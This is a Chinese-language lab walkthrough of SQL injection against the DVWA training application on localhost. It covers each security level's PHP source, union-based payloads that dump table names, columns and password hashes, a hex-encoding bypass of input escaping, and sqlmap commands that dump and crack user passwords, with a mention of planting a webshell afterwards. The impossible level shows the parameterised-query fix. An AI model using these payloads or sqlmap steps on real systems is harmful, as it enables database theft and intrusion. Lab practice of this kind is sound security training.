dvwa——sql手动注入和sqlmap自动注入

手动注入

low:

源码：

<?php

if( isset( $_REQUEST[ 'Submit' ] ) ) {
	// Get input
	$id = $_REQUEST[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
	$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	mysqli_close($GLOBALS["___mysqli_ston"]);
}

?>

分析源码可以看到，\(query语句下直接使用\)id拼接sql查询语句，完全没有过滤，导致sql注入的产生。同时也能够理解整个web应该用程序是如何产生html页面的输出的。

利用：

1、 测试是否存在注入点：

输入1'，报错You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1，说明存在注入点。

2、爆出数据库：

payload：1' union select 1,database()#，



看到两个数据库存在

3、爆出数据表：

payload:1' union select1,table_name from information_schema.tables where table_name='dvwa'#



4、爆出字段名：

payload:1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #



5、得到数据项内容：

payload:1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

至此，数据库里的信息已经被下载到本地，注入攻击完成，后续可以用其他方法从sql里添加一个webshell，获取更高的服务器权限。为了叙述方便，其他级别只讲不同之处。

middle：

源码：

<?php

if( isset( $_POST[ 'Submit' ] ) ) {
	// Get input
	$id = $_POST[ 'id' ];

	$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);

	$query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Display values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

}

// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];

mysqli_close($GLOBALS["___mysqli_ston"]);
?>

分析源码，使用了mysqli_real_escape_string()函数来过滤危险字符。同时观察前端html页面，使用了下拉菜单来限制选项。但是可以通过burp拦截修改数据包绕过。

mysql_real_escape_string() 函数

转义 SQL 语句中使用的字符串中的特殊字符。

下列字符受影响：

\x00

\n

\r

\

'

"

\x1a

如果成功，则该函数返回被转义的字符串。如果失败，则返回 false。

利用：

1、测试是否存在sql漏洞：

拦包，修改如下，可发现存在漏洞



2、爆出数据库和数据表的payload不变，因为没有收到转义字符函数的影响，但是第四步爆出字段名的payload中有引号的存在导致不能使用，需要进行绕过

百度一个绕过姿势，发现可以通过16进值绕过。把整个'user'转译为0x7573657273，就可以继续使用第四步的payload:

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

使用结果如下：



3、爆出数据项的payload没有引号存在，不受影响可以继续使用

high：

源码：

<?php

if( isset( $_SESSION [ 'id' ] ) ) {
	// Get input
	$id = $_SESSION[ 'id' ];

	// Check database
	$query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
	$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

	// Get results
	while( $row = mysqli_fetch_assoc( $result ) ) {
		// Get values
		$first = $row["first_name"];
		$last  = $row["last_name"];

		// Feedback for end user
		$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>

跟middle级别相比，添加了一句LIMIT 1，以期望限制返回数据的条数，然而实际上可以通过#注释掉。这样，在payload上，基本没有变化。应用在middle级别上的均可以使用。

impossle:

<?php

if( isset( $_GET[ 'Submit' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$id = $_GET[ 'id' ];

	// Was a number entered?
	if(is_numeric( $id )) {
		// Check the database
		$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
		$data->bindParam( ':id', $id, PDO::PARAM_INT );
		$data->execute();
		$row = $data->fetch();

		// Make sure only 1 result is returned
		if( $data->rowCount() == 1 ) {
			// Get values
			$first = $row[ 'first_name' ];
			$last  = $row[ 'last_name' ];

			// Feedback for end user
			$html .= "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
		}
	}
}

// Generate Anti-CSRF token
generateSessionToken();
?>

分析代码可看到，采用token方式反csrf攻击；同时使用了预编程技术，参数化了$id的值，不再简单拼接sql查询字符串，这使得sql攻击不再有效。

使用sqlmap自动化注入：

在low级别下测试：

(经过测试，在low，middle，high三个级别均可以完成，在此以low为例)

拦包看一下

GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

Cookie: security=low; PHPSESSID=ppuucmoddjbj5cg5kmo49g3v8s

Connection: close

Upgrade-Insecure-Requests: 1

看到使用了get方法递交查询参数，同时看到有cookies存在，启动sqlmap时同时带上参数和cookies。payload:sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ppuucmoddjbj5cg5kmo49g3v8s" 为叙述方便称为原始命令

这是sqlmap的注入过程

这是sqlmap给出的探测结论

在原始命令上附加--dbs用来探测当存在的全部database，结果如图

在原始命令上附加-D dvwa --tables用以选择名为dvwa的数据库，并爆表名，结果如图

在原始命令上附加-D dvwa -T users --columns,用以选择数据库下的users列名和数据类型

在原始命令上附加-D dvwa -T users -C user,password --dump,用以选择user和password列爆出其内容。事实上，密码是以MD5形式存在与数据库中的，sqlmap在检测到之后，会自动询问是否进行破解。跟随提示可以选择使用sqlmap内置的彩虹表破解，也可以指定自己的。这里默认进行了破解，显示了原始值

到此，已经获得了登陆密码。继续的操作可以是通过sqlmap获取webshell，时间有限，想要进一步了解可以，参考这篇帖子